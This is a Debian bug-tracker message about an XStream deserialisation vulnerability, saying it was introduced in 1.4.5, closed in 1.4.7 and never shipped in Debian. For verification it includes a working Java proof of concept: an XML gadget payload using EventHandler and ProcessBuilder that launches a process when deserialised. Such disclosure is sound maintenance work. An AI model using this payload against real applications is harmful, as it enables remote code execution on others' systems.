notfixed 734821 1.4.7-1 thanks This bug was actually never in Debian, since it was introduced in 1.4.5 and closed in 1.4.7.
If anyone is interested in verifying this, the following code can be run against the JARs present at http://repo.maven.apache.org/maven2/com/thoughtworks/xstream/xstream/: import java.io.IOException; import com.thoughtworks.xstream.XStream; import com.thoughtworks.xstream.io.xml.DomDriver; /* Thanks to </pwntester> for the PoC * http://www.pwntester.com/blog/2013/12/23/rce-via-xstream-object-deserialization38/ */ public class XStreamExploit { public static void main(String[] args) throws IOException { String process = "/usr/bin/xeyes"; String payload = "<sorted-set>" + "<string>foo</string>" + "<dynamic-proxy>" + "<interface>java.lang.Comparable</interface>" + "<handler class=\"java.beans.EventHandler\">" + " <target class=\"java.lang.ProcessBuilder\">" + " <command>" + " <string>" + process + "</string>" + " </command>" + " </target>" + " <action>start</action>" + "</handler>" + "</dynamic-proxy>" + "</sorted-set>"; XStream xstream = new XStream(new DomDriver()); xstream.fromXML(payload); } } Cheers, --Seb __ This is the maintainer address of Debian's Java team <http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers>. Please use debian-j...@lists.debian.org for discussions and questions.
